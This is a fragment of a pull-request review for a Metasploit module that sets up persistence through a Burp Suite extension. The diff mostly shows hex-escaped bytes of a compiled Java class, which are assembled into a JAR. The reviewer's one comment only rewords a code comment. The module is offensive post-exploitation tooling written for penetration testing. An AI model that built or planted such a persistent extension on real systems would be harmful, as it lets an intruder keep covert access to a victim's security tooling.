modules/exploits/multi/local/burp_extension_persistence.rb

```diff
@@ -0,0 +1,411 @@
+    burp_extension_class << "\x01\x1f\x01\x0c\x00\x0b\x00q\x01\xfe\x01 \x01\x13\x00\x09\x02t\x00\x0f\x01\x1a\x01\x1d\x00\x09\x00\x00\x02\x84\x01\x05\x01\x06\x00\x00\x00"
+    burp_extension_class << "\x00\x02\x84\x01!\x01\"\x00\x01\x00\x0d\x02w\x01#\x01\x13\x00\x02\x00\x1c\x02h\x01$\x01\x10\x00\x03\x00*\x02Z\x01%\x01\x11\x00\x04\x00B"
+    burp_extension_class << "\x02B\x01&\x01\x0a\x00\x05\x00R\x022\x01'\x01\x0a\x00\x06\x00\\\x02(\x01(\x01\x11\x00\x07\x01)\x00\x00\x00\x0c\x00\x01\x01\xdb\x00$\x01\x14"
+    burp_extension_class << "\x01*\x00\x0d\x01+\x00\x00\x01\xba\x00\x16\xff\x00\xd5\x00\x0e\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07"
+    burp_extension_class << "\x004\x00\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00g\x07\x00>\x00\x01\x07\x00w\xff\x00\x09\x00\x0f\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00"
+    burp_extension_class << "\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00g\x07\x00>\x07\x00w\x00\x01\x07\x00w\x08\xf9\x00\x02"
+    burp_extension_class << "\xfa\x00 \xff\x00\x1a\x00\x0a\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x07\x01,\x07\x00\xb9\x00\x00"
+    burp_extension_class << "\xff\x00\x02\x00\x0a\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x07\x00\xb9\x00\x00\xfc\x00*\x07"
+    burp_extension_class << "\x00\xb9\xff\x00A\x00\x0d\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x07\x00\xb9\x07\x00\xb9\x07"
+    burp_extension_class << "\x00g\x07\x00\xb9\x00\x01\x07\x00w\xff\x00\x0e\x00\x0e\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00"
+    burp_extension_class << "\x07\x00\xb9\x07\x00\xb9\x07\x00g\x07\x00\xb9\x07\x00w\x00\x01\x07\x00w\x08\xf9\x00\x02\xff\x00T\x00\x0d\x07\x00\xfe\x07\x009\x07\x00\xb9"
+    burp_extension_class << "\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x07\x00\xb9\x07\x00\xb9\x07\x00g\x07\x00\xbd\x00\x01\x07\x00w\xff\x00\x09\x00\x0e\x07"
+    burp_extension_class << "\x00\xfe\x07\x009\x07\x00\xb9\x07\x00\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x07\x00\xb9\x07\x00\xb9\x07\x00g\x07\x00\xbd\x07\x00w\x00"
+    burp_extension_class << "\x01\x07\x00w\x08\xf9\x00\x02B\x07\x00\xe3S\x07\x00\xebS\x07\x00\x98\xf9\x00\x1f\xff\x00\x09\x00\x08\x07\x00\xfe\x07\x009\x07\x00\xb9\x07\x00"
+    burp_extension_class << "\x19\x07\x004\x07\x00>\x07\x00>\x07\x004\x00\x01\x07\x00\x98\x10\x00\x03\x01.\x00\x00\x00\x02\x01/\x010\x00\x00\x00\x1a\x00\x04\x011\x00\x01"
+    burp_extension_class << "\x017\x011\x00\x01\x019\x011\x00\x01\x01;\x011\x00\x01\x01=\x01?\x00\x00\x00\x0a\x00\x01\x01@\x01B\x01D\x00\x19"
+
+    jar = Rex::Zip::Jar.new
+    # build our manifest manually because its only one line and we don't need the extra
+    # lines that build_manifest adds. This more closely implements the gradle build command
```

Comment:
```suggestion
    # build our manifest manually because its only one line and we don't need the extra
    # ones that build_manifest adds. This more closely implements the gradle build command
```